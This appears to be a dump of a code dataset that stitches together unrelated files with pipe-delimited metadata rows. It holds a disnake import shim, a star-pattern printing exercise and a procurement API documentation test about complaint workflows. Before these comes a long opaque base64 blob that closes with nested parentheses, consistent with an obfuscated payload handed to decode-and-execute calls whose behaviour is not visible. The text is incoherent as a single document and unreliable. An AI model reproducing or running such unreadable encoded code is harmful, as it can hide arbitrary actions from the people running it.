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"))))
| 9,541.333333 | 28,595 | 0.955806 | 1,208 | 28,624 | 22.648179 | 0.97351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.175687 | 0.000175 | 28,624 | 2 | 28,596 | 14,312 | 0.780286 | 0 | 0 | 0 | 0 | 0.5 | 0.996995 | 0.996995 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 11 |
11cf9329ea928f2aec6067bd835fcc530901ad5b | 126 | py | Python | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | discord/mentions.py | kuzaku-developers/disnake | 61cc1ad4c2bafd39726a1447c85f7e469e41af10 | [
"MIT"
] | null | null | null | from disnake.mentions import *
from disnake.mentions import __dict__ as __original_dict__
locals().update(__original_dict__)
| 25.2 | 58 | 0.84127 | 16 | 126 | 5.75 | 0.5625 | 0.23913 | 0.413043 | 0.543478 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 126 | 4 | 59 | 31.5 | 0.807018 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
e10c50515f9221474465101624735abaf3114932 | 260 | py | Python | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | 01. FirstStepsInPython/06. SquareOfStars.py | indieza/Python-Developing | f7b5fa7e9ca5d9e8ad30fc7d2a1a21e2ad4b75a4 | [
"MIT"
] | null | null | null | n = int(input())
for x in range(n):
print("*", end="")
print()
for x in range(1, n - 1):
print("*", end="")
for y in range(1, n - 1):
print(" ", end="")
print("*", end="")
print()
for x in range(n):
print("*", end="")
print()
| 16.25 | 29 | 0.446154 | 40 | 260 | 2.9 | 0.275 | 0.344828 | 0.448276 | 0.284483 | 0.887931 | 0.887931 | 0.887931 | 0.431034 | 0 | 0 | 0 | 0.02139 | 0.280769 | 260 | 15 | 30 | 17.333333 | 0.59893 | 0 | 0 | 0.692308 | 0 | 0 | 0.019231 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.615385 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
010977ba082aca27144ddb4b283faec5973dfc27 | 127,655 | py | Python | docs/tests/test_basic_actions.py | ProzorroUKR/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 10 | 2020-02-18T01:56:21.000Z | 2022-03-28T00:32:57.000Z | docs/tests/test_basic_actions.py | quintagroup/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 26 | 2018-07-16T09:30:44.000Z | 2021-02-02T17:51:30.000Z | docs/tests/test_basic_actions.py | ProzorroUKR/openprocurement.api | 2855a99aa8738fb832ee0dbad4e9590bd3643511 | [
"Apache-2.0"
] | 15 | 2019-08-08T10:50:47.000Z | 2022-02-05T14:13:36.000Z | # -*- coding: utf-8 -*-
import os
from copy import deepcopy
from openprocurement.api.models import get_now
from openprocurement.tender.openeu.tests.tender import BaseTenderWebTest
from openprocurement.tender.core.tests.base import change_auth
from openprocurement.tender.belowthreshold.tests.base import test_criteria
from openprocurement.api.constants import RELEASE_2020_04_19
from tests.base.constants import DOCS_URL, AUCTIONS_URL
from tests.base.test import DumpsWebTestApp, MockWebTestMixin
from tests.base.data import (
complaint, claim, lots, subcontracting,
bid_draft, bid2, bid3_with_docs,
qualified, tender_openeu, test_eligible_evidence_data,
test_requirement_data, test_requirement_group_data,
test_criterion_data,
)
from tests.base.helpers import complaint_create_pending
test_tender_data = deepcopy(tender_openeu)
test_lots = deepcopy(lots)
bid = deepcopy(bid_draft)
bid2 = deepcopy(bid2)
bid3 = deepcopy(bid3_with_docs)
bid.update(subcontracting)
bid.update(qualified)
bid2.update(qualified)
bid3.update(qualified)
test_lots[0]['value'] = test_tender_data['value']
test_lots[0]['minimalStep'] = test_tender_data['minimalStep']
test_lots[1]['value'] = test_tender_data['value']
test_lots[1]['minimalStep'] = test_tender_data['minimalStep']
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
TARGET_DIR = os.path.join(BASE_DIR, 'source/tendering/http/')
class TenderResourceTest(BaseTenderWebTest, MockWebTestMixin):
AppClass = DumpsWebTestApp
relative_to = os.path.dirname(__file__)
initial_data = test_tender_data
docservice = True
docservice_url = DOCS_URL
auctions_url = AUCTIONS_URL
def setUp(self):
super(TenderResourceTest, self).setUp()
self.setUpMock()
def tearDown(self):
self.tearDownMock()
super(TenderResourceTest, self).tearDown()
def test_complaints(self):
self.app.authorization = ('Basic', ('broker', ''))
response = self.app.post_json(
'/tenders?opt_pretty=1',
{'data': test_tender_data})
self.assertEqual(response.status, '201 Created')
tender = response.json['data']
owner_token = response.json['access']['token']
self.tender_id = tender['id']
self.set_status("active.tendering")
with open(TARGET_DIR + 'complaints/claim-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id),
{'data': claim})
self.assertEqual(response.status, '201 Created')
complaint_token = response.json['access']['token']
complaint_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/complaint-submission-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints/{}/documents?acc_token={}'.format(self.tender_id, complaint_id,
complaint_token),
{"data": {
"title": "Complaint_Attachment.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}},
)
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/complaint-claim.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint_id, complaint_token),
{"data": {"status": "claim"}})
self.assertEqual(response.status, '200 OK')
claim_data = {'data': claim.copy()}
claim_data['data']['status'] = 'claim'
with open(TARGET_DIR + 'complaints/complaint-submission-claim.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id), claim_data)
self.assertEqual(response.status, '201 Created')
complaint2_token = response.json['access']['token']
complaint2_id = response.json['data']['id']
complaint_data = {'data': complaint.copy()}
complaint_url = "/tenders/{}/complaints".format(self.tender_id)
complaint3_id, complaint3_token = complaint_create_pending(self, complaint_url, complaint_data)
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id), claim_data)
self.assertEqual(response.status, '201 Created')
complaint4_id = response.json['data']['id']
complaint4_token = response.json['access']['token']
with open(TARGET_DIR + 'complaints/complaint-submission.http', 'w') as self.app.file_obj:
response = self.app.post_json(
'/tenders/{}/complaints'.format(self.tender_id),
{'data': complaint})
self.assertEqual(response.status, '201 Created')
complaint1_token = response.json['access']['token']
complaint1_id = response.json['data']['id']
with open(TARGET_DIR + 'complaints/complaint-complaint.http', 'w') as self.app.file_obj:
if get_now() < RELEASE_2020_04_19:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, complaint1_token),
{"data": {"status": "pending"}})
else:
with change_auth(self.app, ("Basic", ("bot", ""))):
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
{"data": {"status": "pending"}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-answer.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "resolved",
"resolution": "Виправлено неконкурентні умови"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, owner_token),
{'data': {
"status": "answered",
"resolutionType": "invalid",
"resolution": "Вимога не відповідає предмету закупівлі"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-satisfy.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint2_id, complaint2_token),
{"data": {
"satisfied": True,
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
if get_now() < RELEASE_2020_04_19:
with open(TARGET_DIR + 'complaints/complaint-escalate.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint4_id, complaint4_token),
{"data": {
"satisfied": False,
"status": "pending"
}})
self.assertEqual(response.status, '200 OK')
complaint5_id, complaint5_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint6_id, complaint6_token = complaint_create_pending(self, complaint_url, complaint_data)
complaint9_id, complaint9_token = complaint_create_pending(self, complaint_url, complaint_data)
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/complaint-reject.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint9_id),
{'data': {
"status": "invalid",
"rejectReason": "alreadyExists"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-accept.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id),
{'data': {
"status": "accepted",
"reviewDate": get_now().isoformat(),
"reviewPlace": "Place of review"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-resolution-upload.http', 'w') as self.app.file_obj:
response = self.app.post_json('/tenders/{}/complaints/{}/documents'.format(self.tender_id, complaint1_id),
{"data": {
"title": "ComplaintResolution.pdf",
"url": self.generate_docservice_url(),
"hash": "md5:" + "0" * 32,
"format": "application/pdf",
}})
self.assertEqual(response.status, '201 Created')
with open(TARGET_DIR + 'complaints/complaint-resolve.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint1_id),
{'data': {
"status": "satisfied"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-decline.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint3_id),
{'data': {
"status": "declined"
}})
self.assertEqual(response.status, '200 OK')
with open(TARGET_DIR + 'complaints/complaint-accepted-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint5_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('broker', ''))
with open(TARGET_DIR + 'complaints/complaint-resolved.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint1_id, owner_token),
{'data': {
"tendererAction": "Умови виправлено",
"status": "resolved"
}})
self.assertEqual(response.status, '200 OK')
if RELEASE_2020_04_19 > get_now():
with open(TARGET_DIR + 'complaints/complaint-accepted-stopping.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint6_id, complaint6_token),
{"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}},
status=200,
)
self.assertEqual(response.status, '200 OK')
self.app.authorization = ('Basic', ('reviewer', ''))
with open(TARGET_DIR + 'complaints/complaint-stopping-stopped.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}'.format(self.tender_id, complaint6_id),
{'data': {
"decision": "Тендер скасовується замовником",
"status": "stopped",
"rejectReason": "tenderCancelled"
}})
self.assertEqual(response.status, '200 OK')
else:
with open(TARGET_DIR + 'complaints/complaint-accepted-stopping-2020-04-19.http', 'w') as self.app.file_obj:
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint6_id, complaint6_token),
{"data": {
"cancellationReason": "Тендер скасовується замовником",
"status": "stopping"
}},
status=403,
)
self.assertEqual(response.status, '403 Forbidden')
if get_now() < RELEASE_2020_04_19:
# before RELEASE_2020_04_19 from pending to mistaken transition was available by reviewer
self.app.authorization = ('Basic', ('broker', ''))
complaint7_id, complaint7_token = complaint_create_pending(self, complaint_url, complaint_data)
with open(TARGET_DIR + 'complaints/complaint-mistaken.http', 'w') as self.app.file_obj:
self.app.authorization = ('Basic', ('reviewer', ''))
response = self.app.patch_json(
'/tenders/{}/complaints/{}?acc_token={}'.format(self.tender_id, complaint7_id, complaint7_token),
{"data": {"status": "mistaken"}},
)
